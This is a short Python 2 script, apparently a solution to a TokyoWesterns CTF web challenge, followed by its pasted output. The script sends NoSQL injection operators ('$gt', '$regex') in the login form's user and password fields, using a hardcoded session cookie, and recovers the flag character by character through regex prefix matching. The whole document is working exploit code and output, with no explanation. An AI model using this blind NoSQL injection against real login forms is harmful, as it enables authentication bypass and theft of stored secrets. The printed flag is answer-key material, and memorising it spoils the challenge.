getadmin.py

import urllib
import urllib2

url = 'http://gap.chal.ctf.westerns.tokyo/login.php'

flag = 'TWCTF{'

table = 'abcdefghijklmnopqrstuvwlyz'
table += table.upper()
table += '_{}'
table += '1234567890 '
table += '!@#$%^&*()_+-='

while not(flag[-1] == '}'):
	for i in table:
		params = {
			'user[$gt]': '',
			'password[$regex]': flag + i
		}

		params = urllib.urlencode(params)
	
		req = urllib2.Request(url)
		req.add_header('Cookie', 'PHPSESSID=pnrtjffuo86jcr8cajir1bp7h3')
		req.add_header('Content-Type', 'application/x-www-form-urlencoded')
		req.add_data(params)
		
		res = urllib2.urlopen(req)
		if res.read().find('TWCTF') > -1:
			flag += i
			print flag
			break

"""
$ python getadmin.py
TWCTF{w
TWCTF{wa
TWCTF{was
TWCTF{wass
TWCTF{wassh
TWCTF{wassho
TWCTF{wasshoi
TWCTF{wasshoi!
TWCTF{wasshoi!s
TWCTF{wasshoi!su
TWCTF{wasshoi!sum
TWCTF{wasshoi!summ
TWCTF{wasshoi!summe
TWCTF{wasshoi!summer
TWCTF{wasshoi!summer_
TWCTF{wasshoi!summer_f
TWCTF{wasshoi!summer_fe
TWCTF{wasshoi!summer_fes
TWCTF{wasshoi!summer_fest
TWCTF{wasshoi!summer_festi
TWCTF{wasshoi!summer_festiv
TWCTF{wasshoi!summer_festiva
TWCTF{wasshoi!summer_festival
TWCTF{wasshoi!summer_festival!
TWCTF{wasshoi!summer_festival!}
"""